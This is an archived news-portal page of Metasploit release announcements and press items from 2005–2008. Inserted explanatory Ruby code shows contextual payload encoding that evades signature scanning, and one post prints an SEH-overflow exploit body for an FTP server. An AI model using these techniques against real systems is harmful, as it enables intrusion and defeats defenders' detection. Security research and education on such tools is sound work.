Metasploit Hacking Tool Now Open for Licensing Posted by cdupuis on Thursday, 16 October 2008 @ 19:59:51 EDT (739 reads) Topic Metasploit
Lou writes "As reported by
Kelly Jackson Higgins Senior Editor, Dark Reading
Metasploit Hacking Tool Now Open for Licensing
The wildly popular Metasploit hacking tool for the first time is now officially open source, open-license technology that can be incorporated into commercial tools.
The free research and penetration testing tool historically has had restricted, non-commercial licensing so that it could only be used by researchers or in-house penetration testers -- not repackaged, redistributed, or sold. But in the new version 3.2 -- due later this month in its final version -- Metasploit project lead HD Moore and his team have transformed Metasploit into an official open source project, complete with a BSD 3-Clause license arrangement that allows others to sell, rename, or “fork” the code in another direction.
"Changing the license to be as open as possible -- BSD 3-clause is nearly public domain -- would not only be fair to the new developers, but allow us to expand beyond the original goal as an exploit platform and become the basis for wide variety of new projects," says Moore. "It's entirely likely that we will see new projects targeted at individual sectors and applications, which we hope will filter some improvements back to the core project. By opening the license to the entire Metasploit codebase, we have let the proverbial cats out of the bag -- it's now just a matter of counting kittens."
For the full article:
http://www.darkreading.com/document.asp?doc_id=165636&WT.svl=news1_6
"
Metasploit 3.1 has been released Posted by boss on Tuesday, 29 January 2008 @ 14:35:49 EST (676 reads) Topic Metasploit
cdupuis writes " METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK
New Version of Attack Framework Ready to Pwn Austin, Texas, January 28th, 2008
-- The Metasploit Project announced today the free, world-wide availability of version 3.1 of their exploit development and attack framework.
The latest version features a graphical user interface, full support for the Windows platform, and over 450 modules, including 265 remote exploits.
"Metasploit 3.1 consolidates a year of research and development, integrating ideas and code from some of the sharpest and most innovative folks in the security research community" said H D Moore, project manager. Moore is referring to the numerous research projects that have lent code to the framework.
These projects include:
- The METASM pure-ruby assembler developed by Yoann Guillot and Julien Tinnes,
- The "Hacking the iPhone" effort outlined in the Metasploit Blog,
- the Windows kernel-land payload staging system developed by Matt Miller,
- the heapLib browser exploitation library written by Alexander Sotirov,
- the Lorcon 802.11 raw transmit library created by Joshua Wright and Mike Kershaw,
- Scruby, the Ruby port of Philippe Biondi's Scapy project, developed by Sylvain Sarmejeanne,
- and a contextual encoding system for Metasploit payloads.
"Contextual encoding breaks most forms of shellcode analysis by encoding a payload with a target-specific key" said I)ruid, author of the Uninformed Journal (volume 9) article and developer of the contextual encoding system included with Metasploit 3.1.
The graphical user interface is a major step forward for Metasploit users on the Windows platform. Development of this interface was driven by Fabrice Mourron and provides a wizard-based exploitation system, a graphical file and process browser for the Meterpreter payloads, and a multi-tab console interface.
"The Metasploit GUI puts Windows users on the same footing as those running Unix by giving them access to a console interface to the framework" said H D Moore, who worked with Fabrice on the GUI project.
The latest incarnation of the framework includes a bristling arsenal of exploit modules that are sure to put a smile on the face of every information warrior.
Notable exploits in the 3.1 release include a remote, unpatched kernel-land exploit for Novell Netware, written by toto, a series of 802.11 fuzzing modules that can spray the local airspace with malformed frames, taking out a wide swath of wireless-enabled devices, and a battery of exploits targeted at Borland's InterBase product line. "I found so many holes that I just gave up releasing all of them", said Ramon de Carvalho, founder of RISE Security, and Metasploit contributor.
"Metasploit continues to be an indispensable and reliable penetration testing framework for our modern era", says C. Wilson, a security engineer who uses Metasploit in his daily work. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide.
The framework is written in the Ruby programming language and includes components written in C and assembler. Metasploit runs on all modern operating systems, including Linux, Windows, Mac OS X, and most flavors of BSD. Metasploit has been used on a wide range of hardware platforms, from massive Unix mainframes to the tiny Nokia n800 handheld.
Users can access Metasploit using the tab-completing console interface, the Gtk GUI, the command line scripting interface, or the AJAX-enabled web interface.
The Windows version of Metasploit includes all software dependencies and a selection of useful networking tools.
The latest version of the Metasploit Framework, as well as screen shots, video demonstrations, documentation and installation instructions for many platforms, can be found online at: http://metasploit3.com/ "
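Contextual encoding, as described in the 3.1 announcement above, keys the payload to bytes the exploit can read on the target at run time, so the key never travels with the blob and an analyst who only has the blob (or a sandbox with different memory contents) cannot recover the payload. The Ruby below is an added example written for this page; it is not I)ruid's encoder or any code from the Metasploit Framework. The "memory" hashes, the key address 0x7c800000, the key length and the payload bytes are all constructed stand-ins.

```ruby
# Contextual keying of a payload: added illustration, not the framework's encoder.
# The key is never shipped with the encoded blob; the decoder stub that would run
# on the target reads it from memory the exploit knows to be present.

# Constructed "target memory" (address => bytes). Stands in for something like the
# first bytes of a module mapped at a known address, which differ between builds.
KEY_ADDR       = 0x7c800000
KEY_LEN        = 4
TARGET_MEMORY  = { KEY_ADDR => "\xe9\x4b\x1f\x7a\x90\x90\xcc\xcc".b }
SANDBOX_MEMORY = { KEY_ADDR => "\xe9\x4b\x1f\x7b\x90\x90\xcc\xcc".b } # analyst's box, one byte off

# Constructed stand-in for shellcode; only its byte content matters here.
PAYLOAD = "\x31\xc0\x50\x68/sh\x00\x68/bin\x89\xe3".b

# What the decoder stub does on the target: read KEY_LEN bytes at KEY_ADDR.
def read_key(memory, addr = KEY_ADDR, len = KEY_LEN)
  key = memory.fetch(addr)[0, len]
  # a zero byte in the key leaves every matching payload byte in the clear
  raise ArgumentError, 'weak key: contains a zero byte' if key.include?("\x00".b)
  key
end

def xor_bytes(data, key)
  data.bytes.each_with_index.map { |b, i| b ^ key.getbyte(i % key.bytesize) }.pack('C*')
end

# Encoding happens on the attacker's side, using what is known about the target.
def encode_contextual(payload, memory)
  xor_bytes(payload, read_key(memory))
end

# Decoding happens on whatever machine runs the blob, with whatever bytes that
# machine has at KEY_ADDR. Only the real target reproduces the original payload.
def decode_contextual(blob, memory)
  xor_bytes(blob, read_key(memory))
end

# What a static signature scanner sees: the strings an analyst would grep for
# are no longer present in the encoded blob.
def static_signature_hit?(blob, signature)
  blob.include?(signature)
end

if __FILE__ == $0
  blob = encode_contextual(PAYLOAD, TARGET_MEMORY)
  puts "encoded:            #{blob.unpack1('H*')}"
  puts "decoded on target:  #{decode_contextual(blob, TARGET_MEMORY) == PAYLOAD}"
  puts "decoded in sandbox: #{decode_contextual(blob, SANDBOX_MEMORY) == PAYLOAD}"
end
```

The XOR is only the carrier; the point is where the key comes from. A real decoder stub must perform the memory read itself on the target, and the exploit author has to choose an address whose contents are stable on the intended target but differ on other systems, otherwise the "context" degrades to a constant key.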
Use Metasploit to hack an IPhone Posted by boss on Wednesday, 17 October 2007 @ 10:23:55 EDT (549 reads) Topic Metasploit
cdupuis writes "As seen at: COMPUTERWORLD
October 16, 2007 (Computerworld)
Noted hacker HD Moore has publicly posted exploits that take advantage of a vulnerability in Apple's iPhone, the same flaw that's been used by others to unlock the smart phone so it will work on non-AT&T networks.
The vulnerability, which is in the TIFF image-rendering library shared by the iPhone's Safari browser and its e-mail program, as well as by the iTunes software, leaves the iPhone wide open to attack, said Moore, who posted a second, and more robust, exploit today after debuting attack code yesterday.
"This exploit is rock solid," Moore said in an interview. "It's very reliable, as reliable as the WMF [Windows Metafile] exploits in Windows. You can send it in an e-mail, you can embed it in a Web page."
Although the vulnerability is the same as the one leveraged by hackers such as the iPhone Dev Team to return unlock capabilities to iPhones updated to Firmware 1.1.1 last month, Moore said that's the only similarity between his work and the activities of unlockers. "I wanted an exploit that would write any arbitrary payload" to the iPhone, rather than the specialized changes made for an unlocking hack, Moore said. He claimed success.
"The second exploit works on 1.0, 1.0.1, 1.0.2 and 1.1.1 iPhones," he said, referring to the four versions of the phone's firmware released since the device's June debut. Although he expects Apple to plug the TIFF vulnerability in the next iPhone update -- a move that many interested in unlocking the iPhone have also predicted and bemoaned -- Moore also said it wouldn't matter. Citing the history of the vulnerability, which was also present in the Sony PlayStation Portable (PSP), he said attackers will be able to exploit the flaw in the future, even if Apple fixes it. "All they'll need to do is back port the firmware to an earlier version that's vulnerable," said Moore.
"Apple has to leave a way to restore an iPhone back [to previous versions of the firmware]." The same technique was used to hack the Sony PSP after Sony issued an update that patched the TIFF vulnerability on that video game player.
In notes posted to customers of its DeepSight threat management network, Symantec Corp. warned iPhone users of Moore's exploits and recommended they use caution when browsing the Web, handling unsolicited e-mail and dealing with suspicious or unexpected music files.
But Ollie Whitehouse, a software architect with Symantec's security response team, downplayed the iPhone's apparent insecurity. "The iPhone isn't any different from other mobile platforms," he argued. "It's only the interest from the security research community that makes it seem different."
Moore disagreed. "I think the iPhone is pretty terrible," he said, referring to its level of security. "It's an easy platform to exploit." That's true in part, he explained, because exploiting any iPhone application gives root access to the entire phone. But other security weaknesses abound, including ones in the Safari browser and in the underlying operating system -- a scaled-back version of Mac OS X -- that runs the device, he added.
Moore has added the exploits to Metasploit, the popular penetration framework, a move that in the past has meant in-the-wild attacks are not far behind. He predicted that malicious code exploiting the TIFF vulnerability would be on the loose "pretty soon." "
HD Moore & Valsmith Tactical Exploitation Paper from Black Hat and Defcon Posted by boss on Friday, 10 August 2007 @ 12:52:34 EDT (789 reads) Topic Metasploit
Anonymous writes "At Black Hat 2007 and Defcon 15, Valsmith and I gave a talk entitled "Tactical Exploitation".
This talk introduced a tactical approach to penetration testing that does not rely on exploiting known vulnerabilities.
During the talk, we used a combination of new tools and lesser-known techniques to walk through the process of compromising a target network.
The materials for this talk are now online, including the slides, white paper, and videos. These materials can be found online at:
- http://metasploit.com/confs/
For those who missed both the talks or couldn't stay for all of one, the white paper does a good job of covering the things we discussed:
- http://metasploit.com/confs/blackhat2007/tactical_paper.pdf
Most of the exploits and tools can be found in the trunk version of the Metasploit Framework. These will be merged into the stable tree over the next week or so (along with some HOWTOs on the Metasploit Blog).
To grab the latest version of the Metasploit Framework, you can use the following command:
$ svn co http://metasploit.com/svn/framework3/trunk/ msf3-trunk
$ ./msf3-trunk/msfconsole
Thanks to everyone who came to our talks!
-HD"
Metasploit Framework 3.0 has been released Posted by boss on Tuesday, 27 March 2007 @ 10:02:23 EDT (1649 reads) Topic Metasploit
Anonymous writes "March 27th, 2007 -- Metasploit is pleased to announce the immediate, free availability of the Metasploit Framework version 3.0 from http://framework.metasploit.com/ .
The Metasploit Framework ("Metasploit") is a development platform for creating security tools and exploits. Version 3.0 contains 177 exploits, 104 payloads, 17 encoders, and 3 nop modules. Additionally, 30 auxiliary modules are included that perform a wide range of tasks, including host discovery, protocol fuzzing, and denial of service testing.
Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
Metasploit runs on all modern operating systems, including Linux, Windows, Mac OS X, and most flavors of BSD. Metasploit has been used on a wide range of hardware platforms, from massive Unix mainframes to the tiny Nokia n800 handheld. Users can access Metasploit using the tab-completing console interface, the command line scripting interface, or the AJAX-enabled web interface. The Windows version of Metasploit includes all software dependencies and a selection of useful networking tools.
The latest version of the Metasploit Framework, as well as screen shots, video demonstrations, documentation and installation instructions for many platforms, can be found online at http://framework.metasploit.com/
Metasploit 3 is a from-scratch rewrite of Metasploit 2 using the Ruby scripting language. The development process took nearly two years to complete and resulted in over 100,000 lines of Ruby code. As such, there are some notable differences between version 2.7 and 3.0:
* The Fs, Sys, Net, and Process extensions in the Metasploit 2.7 Meterpreter have been combined into a single extension that is automatically loaded in Metasploit 3. The "stdapi" extension can be used to manipulate files, list and manage processes, migrate the payload into a new process, edit a file on the server, forward a port, execute a command, and many other tasks. The "priv" extension (accessible by the "use priv" command) provides the hashdump command for dumping password hashes and the timestomp command for erasing file system timestamps.
* The Meterpreter shell provides an "irb" command that allows interactive scripting of a compromised system. One of the features of the Metasploit client API is the ability to read and write the memory of any accessible process on the exploited system, all from inside a Ruby shell. When combined with a Meterpreter script (started with the "run" command from inside Meterpreter), this feature can be used to backdoor running applications or steal in-memory credentials.
* The Metasploit console provides an "irb" command (on Unix systems only) that allows direct access to the Ruby internals at runtime. This can be used to modify the behavior of the framework, interact with existing connections, and as a development environment for plugins.
* The Metasploit console interface has a new "route" command that allows all network connections to a given subnet to be routed through an existing session. This can be used in conjunction with the Meterpreter payload to relay attacks through exploited systems.
* Database support is provided via a set of plugins and a standard command interface. The database can be used to track host information during a penetration test and launch automated attacks against a network (db_autopwn). The current release can import both Nessus NBE files and Nmap XML output files. Data provided by these tools can be used to cross-reference open ports and vulnerabilities with Metasploit modules.
* User options have been separated into three types: standard, advanced, and evasion. Evasion options allow the user to bypass IDS and IPS systems by specifying how exploit data is generated and delivered. Evasion options are available for most exploits, with particular attention paid to the SMB, DCERPC, and HTTP protocols.
* A plugin system allows developers to add their own commands to the console interface, hook framework events, and extend the framework at runtime without having to modify the base code. Example plugins have been included in the "plugins" subdirectory of the framework. Example plugins include an "auto-tagger", a socket filter, a telnet service, and a number of database and debugging plugins.
* An event subscription system allows modules and plugins to wait for specific events and automatically perform different actions. This feature can be used to hook socket operations, filter data flows, and automate post-exploitation tasks.
* Metasploit modules can import methods and behaviors from a huge library of Ruby Mixins. This release includes support for protocols such as SMB, DCERPC, FTP, IMAP, NDMP, SMTP, and SUNRPC. Mixins are also provided for developing brute force exploits, creating egghunters, injecting user-land payloads from the Windows kernel, exploiting SEH overwrites, sniffing network traffic, and injecting raw WiFi frames.
* Metasploit modules are now organized in a directory structure instead of a single flat directory. A caching system provides faster loading times. The result is a scalable system that can manage hundreds of different modules at a time (over 300 alone in this release).
* The web interface (msfweb) is a Ruby on Rails application that uses the Prototype JavaScript Framework to provide in-browser windowing support. Asynchronous JavaScript is used to provide as-you-type search results for any module type and provide tab completion for the web console interface.
* Thanks to Ruby's in-process threading support, it is possible to share a single Metasploit instance with other users, exploit multiple hosts at the same time, and run persistent background services, while only consuming the system resources of a single process. The msfd plugin adds a telnet interface to an existing Metasploit instance.
* The new Auxiliary module type allows the development of almost any form of security or attack tool. Auxiliary modules have complete access to the Metasploit attack and protocol libraries and can be used to quickly develop research tools and proof-of-concepts.
* Subversion is now used for online updates and version control. This allows users to easily switch between the development and stable version of the framework and obtain online updates using any transport supported by Subversion.
* This release includes three exploit modules that exploit WiFi driver vulnerabilities in the Windows kernel. Combined with the kernel user-land payload stager, this allows any Metasploit payload to be used with ring-0 exploits on the Windows platform. A handful of auxiliary modules are included that trigger denial of service conditions in WiFi drivers across a variety of platforms.
* Metasploit is now released under the Metasploit Framework License. This license allows anyone to use the framework for almost anything, but prevents commercial abuse and outright code theft. The Metasploit Framework License helps keep the platform stable and still allows module developers to choose their own licensing terms for their code (commercial or open source). For more information, please see the license document included in the distribution.
* The Rex library, which provides most of the utility methods and protocol support for the framework, has been released under the 3-clause BSD license. Ruby developers can use this code to build open source or commercial applications that are not subject to the restrictions of the Metasploit Framework License.
Enjoy!
- The Metasploit Staff "
VulnDisco Pack for Metasploit with zero day exploits Posted by boss on Monday, 06 November 2006 @ 21:43:09 EST (594 reads) Topic Metasploit
cdupuis writes "NOTE FROM CLEMENT: As of Nov 15, 2006, this package is no longer available from Gleg; it seems they were pressured into dropping their support and free giveaway for the Metasploit framework. The following is now posted on their site:
For security reasons, we have currently stopped providing this product in both its free and commercial versions. All information intended for this product has been moved to VulnDisco Pack Professional, which is available to valid Immunity CANVAS users.
Hi All,
I am glad to announce that free version of VulnDisco Pack for Metasploit Framework 2.7 is available for download.
This release includes the following 0day exploits:
vd_ldapinfo.pm - [0day] Query info from LDAP server
vd_xlink.pm - [0day] Omni-NFS Enterprise remote exploit
vd_openldap.pm - [0day] OpenLDAP DoS
You can download it here: http://gleg.net/downloads/VULNDISCO_META_FREE.tar.gz
For more info about VulnDisco Pack for Metasploit please visit: http://gleg.net/vulndisco_meta.shtml
-- Best regards, Evgeny Legerov
Click on Read More... below to learn more about VulnDisco and the products offered by GLEG. "
Metasploit Version 3 Beta 3 is out Posted by boss on Monday, 30 October 2006 @ 16:03:01 EST (389 reads) Topic Metasploit
cdupuis writes "The Metasploit Framework is an advanced open-source exploit development platform.
The 3.0 tree represents a complete rewrite of the 2.0 codebase and provides a scalable and extensible framework for security tool development.
The 3.0 Beta 3 release includes support for: exploit automation[1], 802.11 wireless packet injection[2], and kernel-mode payloads[3].
Windows users are now presented with a RXVT console and an updated Cygwin environment, which greatly improves the usability of the 3.0 interface on the Windows platform.
The Metasploit Web Interface is still in development, but this release includes a preview of what the end functionality will look like. The web interface provides a "webtop" interface for interacting with the framework and uses asynchronous JavaScript to provide live searching. An early version of the Metasploit IDE is also included with the web interface.
Downloads for all platforms can be found here:
- http://metasploit.com/projects/Framework/msf3/#download
The latest version can be pulled directly from Subversion:
$ svn co https://metasploit.com/svn/framework3/trunk/
Unix users may need to install the openssl, zlib, and dl Ruby modules for the Framework to load. If you are using Ubuntu you will need to run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
# apt-get install libdl-ruby
Unix users who wish to try the new web interface will need to install the 'rubygems' package and the 'rails' gem. Please see www.rubyonrails.com for more information and platform-specific installation instructions.
Users of other distributions or Unix flavors may want to grab the latest version of Ruby from www.ruby-lang.org and build it from source. We highly recommend using Ruby version 1.8.4 or newer. Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. The old 3.0 installation should be uninstalled prior to installing and using this version.
The release packages include Subversion repository information allowing you to synchronize your Beta 3 installation with the live development tree. The Windows installer includes a "MSFUpdate" menu item that uses Subversion to download the latest updates. Unix users will need to install the Subversion client, change into the framework directory, and execute 'svn update'.
On Unix systems, Subversion will complain about the self-signed certificate in use at metasploit.com. Please verify that the fingerprint matches the one below before accepting it:
===
- Hostname: metasploit.com
- Valid: from Jun 3 06:56:22 2005 GMT until Mar 31 06:56:22 2007 GMT
- Issuer: Development, The Metasploit Project, San Antonio, Texas, US
- Fingerprint: 1f:a2:8e:ad:14:57:53:75:b7:ab:de:67:e8:fa:17:49:76:f2:ee:ad
===
Enjoy!
- The Metasploit Staff
1. http://tinyurl.com/yadb4p
2. http://www.eweek.com/article2/0,1895,2040914,00.asp
3. http://tinyurl.com/yx5q79
"
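The Beta 3 notes above ask users to compare the self-signed certificate's fingerprint against the announced value before letting Subversion accept it. The Ruby below is an added example for this page, not code from the Metasploit project: it computes the same SHA-1 fingerprint that svn and `openssl x509 -noout -fingerprint -sha1` display, compares the whole value (not a prefix) with the expected one, and, so that it runs offline, exercises the check on a constructed self-signed certificate rather than the one metasploit.com served. The expected fingerprint is copied from the announcement; the host and port of the live fetch are assumptions.

```ruby
require 'openssl'
require 'socket'

# Fingerprint quoted in the Beta 3 announcement (SHA-1 over the DER-encoded cert).
EXPECTED_FP = '1f:a2:8e:ad:14:57:53:75:b7:ab:de:67:e8:fa:17:49:76:f2:ee:ad'

# Same value svn and `openssl x509 -noout -fingerprint -sha1` print.
def sha1_fingerprint(cert)
  OpenSSL::Digest.new('SHA1').hexdigest(cert.to_der).scan(/../).join(':')
end

# Pinning check: the entire fingerprint must match, case-insensitively. Eyeballing
# the first few bytes is the mistake this is meant to prevent.
def fingerprint_matches?(cert, expected)
  sha1_fingerprint(cert) == expected.strip.downcase
end

# Fetch the leaf certificate a TLS server presents. Chain verification is turned
# off on purpose: a self-signed certificate cannot pass it, so trust is decided by
# the pinned fingerprint instead. Assumed usage: peer_cert('metasploit.com', 443).
def peer_cert(host, port = 443)
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
  tcp = TCPSocket.new(host, port)
  ssl = OpenSSL::SSL::SSLSocket.new(tcp, ctx)
  ssl.hostname = host
  ssl.connect
  ssl.peer_cert
ensure
  ssl&.close
  tcp&.close
end

# Constructed self-signed certificate so the check can be exercised offline.
# It is NOT the metasploit.com certificate, so it must fail against EXPECTED_FP.
def make_self_signed(cn)
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2
  cert.serial     = 1
  cert.subject    = OpenSSL::X509::Name.parse("/CN=#{cn}")
  cert.issuer     = cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now
  cert.not_after  = Time.now + 3600
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  cert
end

if __FILE__ == $0
  cert = make_self_signed('example.invalid')
  puts "fingerprint:             #{sha1_fingerprint(cert)}"
  puts "matches announced value: #{fingerprint_matches?(cert, EXPECTED_FP)}"
end
```

Against a live host the same check is `fingerprint_matches?(peer_cert('metasploit.com'), EXPECTED_FP)`; a mismatch means either the certificate was reissued (the announced one expired in March 2007) or something is sitting between you and the server, and in both cases the update should not proceed until the new fingerprint has been confirmed out of band.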
Metasploit Version 2.7 has been released Posted by boss on Monday, 30 October 2006 @ 15:57:46 EST (342 reads) Topic Metasploit
cdupuis writes "The Metasploit Framework is an advanced open-source exploit development platform. The 2.7 release includes three user interfaces, 157 exploits and 76 payloads. The Framework will run on any modern operating system that has a working Perl interpreter. The Windows installer includes a slimmed-down version of the Cygwin environment.
Windows users are encouraged to update as soon as possible. A number of improvements were made that should make the Windows experience a little less painful and a lot more reliable. All updates to 2.6 have been rolled into 2.7, along with some new exploits and minor features.
This release is available from the Metasploit.com web site:
- Unix: http://metasploit.com/tools/framework-2.7.tar.gz
- Win32: http://metasploit.com/tools/framework-2.7.exe
The latest version can be pulled directly from Subversion: $ svn co http://metasploit.com/svn/framework2/trunk/
A demonstration of the msfweb interface is running live from:
- http://metasploit.com:55555/
This may be the LAST 2.x version of the Metasploit Framework. All development resources are now being applied to version 3.0. More information about version 3.0 can be found online at:
- http://metasploit.com/projects/Framework/msf3/
Exploit modules designed for the 2.2 through 2.6 releases should maintain compatibility with 2.7. If you run into any problems using older modules with this release, please let us know.
Donations to the Metasploit Project are now tax deductible for US entities. Please see the donations web page for more information. - http://metasploit.com/donate.html
You can subscribe to the Metasploit Framework mailing list by sending a blank email to framework-subscribe[at]metasploit.com. This is the preferred way to submit bugs, suggest new features, and discuss the Framework with other users.
If you would like to contact us directly, please email us at: msfdev[at]metasploit.com
For more information about the Framework and this release in general, please refer to the online documentation, particularly the User Guide: - http://metasploit.com/projects/Framework/documentation.html
We would like to thank the community in general and the Metasploit contributors in particular for their support of the project.
Changes since the 2.6 release:
windows:
* The Windows installer and Cygwin environment have been updated
* The console size has been greatly improved under Windows
* Large payloads (meterpreter/vncinject) are much more reliable

msfupdate:
* The msfupdate tool has been replaced with Subversion
* All Subversion features (branching, diffs, etc) are supported

meterpreter:
* The SAM extension now works against NX/DEP systems.

exploits:
* Minor cosmetic improvements to many modules
* 14 new exploits added since 2.6 was released

payloads:
* The payload staging system is more reliable for large payloads
* Size reductions and reliability improvements
Enjoy!
- The Metasploit Staff
"
Metasploit 3.0-Beta-1 Has been released Posted by boss on Monday, 07 August 2006 @ 23:41:25 EDT (475 reads) Topic Metasploit
Anonymous writes "Metasploit 3.0 is the next generation of the Metasploit Framework. It is written in the Ruby programming language and is a complete rewrite of the 2.0 branch. The Metasploit 2.0 branch drastically reduced exploit development time and promoted code re-use between similar exploit modules. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. In this light, the 3.0 branch continues to evolve the field of exploitation research and exploitation frameworks in general. The primary goals of the 3.0 branch are listed below:
- Improve automation of exploitation through scripting
- Simplify the process of writing an exploit
- Increase code re-use between exploits
- Improve and generically integrate evasion techniques
- Support automated network discovery and event correlation through recon modules
- Continue to provide a friendly outlet for cutting edge exploitation technology
"
Metasploit Version 2.6 has been released Posted by boss on Wednesday, 24 May 2006 @ 08:35:40 EDT (1294 reads) Topic Metasploit
cdupuis writes "Metasploit Framework ChangeLog ==============================
05/23/2005 Version 2.6 is released
Recent changes:
05/22/2006
New exploit module added: freeftpd_key_exchange
New exploit module added: edirectory_imonitor2
New exploit module added: tftpd32_long_filename
Bug fixes to realvnc_41_bypass
Bug fixes to ie_iscomponentinstalled
New authors added to Credits
Get it from: http://metasploit.com/projects/Framework/downloads.html
See running demo at: http://metasploit.com:55555/ "
Metasploit Framework version 3.0 Alpha Release 1 Posted by boss on Thursday, 15 December 2005 @ 09:25:28 EST (641 reads) Topic Metasploit
Anonymous writes "The Metasploit staff is proud to present the first alpha release of the 3.0 branch of the Metasploit Framework. This release marks a major milestone in the evolution of the Metasploit Framework and is based on a complete rewrite of the 2.x series.
The 3.0 branch is designed to provide automation capabilities at every stage of the discovery and exploitation process. Nearly every component of the framework can be extended, hooked, and automated, allowing for streamlined penetration testing and tight integration with third-party products. Unlike the 2.0 series, the 3.0 branch is written in Ruby, an object-oriented, interpreted scripting language, that has drastically simplified the implementation of the framework.
This release includes 44 exploits, 76 payloads, 7 encoders, 2 nops, and 2 recon modules. The supported platforms are Linux, Mac OS X, and most BSDs. The framework requires version 1.8.1 or newer of the Ruby interpreter. Windows is not supported at this time, either through Cygwin or the native build. Mac OS X users will need to install Ruby from source (or an OSS package manager) due to a build error in the version of Ruby supplied with Mac OS 10.4.
The latest 3.0 code, developer documentation, and general information can be found online at the following location:
- http://metasploit.com/projects/Framework/msf3/
This is an *alpha release*, expect things to break, crash, and generally not work very well. This version is being released to gather feedback from the community and to weed out the major bugs before entering the true beta period. There are many features that have not been completely implemented at this point and there are still some edges that will need to be smoothed out prior to the final release. A few major features are not implemented, including msfweb's exploit mode, some levels of session interaction, and the more user-friendly scripting APIs.
Bugs can be submitted to msfdev[at]metasploit.com, or by subscribing to the framework-beta mailing list. To subscribe, send a blank email to framework-beta-subscribe[at]metasploit.com.
To demonstrate how the 3.0 branch has simplified exploit development, check out the following code sample, which provides the exploit body for the 3Com 3CDaemon 2.0 FTP Username Overflow (3cdaemon_ftp_user.rb):
---
connect                                                   # open the FTP control connection
print_status("Trying target #{target.name}...")
buf = Rex::Text.rand_text_english(2048, payload_badchars) # 2048 bytes of filler free of bad characters
seh = generate_seh_payload(target.ret)                    # next-SEH jump, handler address, then the encoded payload
buf[229, seh.length] = seh                                # the SEH record lies at offset 229 of the USER argument
send_cmd( ['USER', buf] , false )                         # deliver the overflow
disconnect
handler                                                   # wait for the payload to call back
---
This release includes many new features that are not present in the 2.x series. The highlights are presented below:
[ The Metasploit Console Interface ]
The msfconsole interface in version 3.0 is similar to the 2.x series, however the available command set and interaction options have been dramatically extended.
* Backgrounded exploits -- It's now possible to execute an exploit in the background. This means you can have an exploit that triggers a passive vulnerability (such as a browser bug, a sniffer exploit, etc) while performing other tasks. Each successful exploit attempt will show up in the list of active sessions, any of which can be accessed at any time.
* Multi-session exploits -- Unlike the 2.x series, the 3.0 branch is capable of creating multiple sessions from a single exploit. This is especially useful in the context of passive exploits that can have multiple clients connecting.
* Multiple concurrent sessions -- It is possible to have more than one active session established. An active session can be sent to the background through the ^Z sequence.
* IRB mode -- The console interface supports dropping into a Ruby scripting interface that allows direct interaction with the framework instance. This makes it possible to do low-level interaction with sessions and framework modules.
[ The Meterpreter Payload ]
The Meterpreter payload has been extended and refined for the 3.0 branch. The underlying architecture and design remains the same, but the feature
Click on Read More... below for a detailed list of changes and features "
Metasploit 2.5 is released Posted by boss on Tuesday, 25 October 2005 @ 00:46:26 EDT (548 reads) Topic Metasploit
Anonymous writes "The Metasploit Framework is an advanced open-source exploit development platform. The 2.5 release includes three user interfaces, 105 exploits and 75 payloads.
The Framework will run on any modern operating system that has a working Perl interpreter. The Windows installer includes a slimmed-down version of the Cygwin environment.
A demonstration of the msfweb interface is running live from:
- http://metasploit.com:55555/
Information about version 3.0 has been posted online:
- http://metasploit.com/projects/Framework/msf3/
Exploit modules designed for the 2.2 through 2.4 releases should maintain compatibility with 2.5. If you run into any problems using older modules with this release, please let us know.
The Framework development team consists of a few active members and over a dozen contributors. Check out the donations web page for a complete list of contributors: - http://metasploit.com/donate.html
You can subscribe to the Metasploit Framework mailing list by sending a blank email to framework-subscribe[at]metasploit.com. This is the preferred way to submit bugs, suggest new features, and discuss the Framework with other users.
If you would like to contact us directly, please email us at: msfdev[at]metasploit.com.
Enjoy!
- The Metasploit Framework Development Team
"
Metasploit Web Interface Tutorial Posted by boss on Sunday, 10 July 2005 @ 12:07:01 EDT (1880 reads) Topic Metasploit
New version of Metasploit released Posted by boss on Wednesday, 11 May 2005 @ 22:32:09 EDT (893 reads) Topic Metasploit
The Metasploit Framework is an advanced open-source exploit development platform. The 2.4 release includes three user interfaces, 72 exploits and 75 payloads.
The Framework will run on any modern operating system that has a working Perl interpreter. The Windows installer includes a slimmed-down version of the Cygwin environment.
Some highlights in this release:
- Previously unreleased exploits (20 others added since 2.3)
  + Solaris KCMS Arbitrary File Read
  + Solaris snmpXdmid AddComponent Overflow
  + Metasploit Framework Payload Handler
  + Microsoft Message Queueing Service MS05-017
  + Minishare 1.41 Buffer Overflow
- Addition of the new SunRPC and XDR Perl API
  + Allows for clean RPC exploit development
  + Used by two new exploit modules (KCMS and snmpXdmid)
  + Updated sadmind exploit uses the new API
- Includes the new win32 PassiveX payload system
  + Loads an arbitrary ActiveX through Internet Explorer
  + PassiveX payload loads the next stage over HTTP
  + HTTP transport emulates a standard TCP connection
  + Interact with cmd.exe, VNC, or Meterpreter over HTTP
  + Uses Internet Explorer settings for proxy access
  + Fully-functional on systems with Internet Explorer 6
  + Extensive documentation is available online: http://www.uninformed.org/?v=1&a=3&t=pdf
- Stability improvements and numerous bug fixes
  + The msfweb interface is slightly less of a memory pig
  + Many exploits have been updated and improved
  + New external references added to the exploit modules
- General improvements to the payload system
  + Brand new "shelldemo" binary for the impurity stager
  + Size reductions to win32_bind, win32_reverse, and others
  + Can now make standalone executables with msfpayload
  + Interact with metasploit payloads via payload_handler.pm
This release is available from the Metasploit.com web site:
- Unix: http://metasploit.com/tools/framework-2.4.tar.gz
- Win32: http://metasploit.com/tools/framework-2.4.exe
A demonstration of the msfweb interface is running live from: http://metasploit.com:55555/
Exploit modules designed for the 2.2 and 2.3 releases should maintain compatibility with 2.4. If you run into any problems using older modules with this release, please let us know.
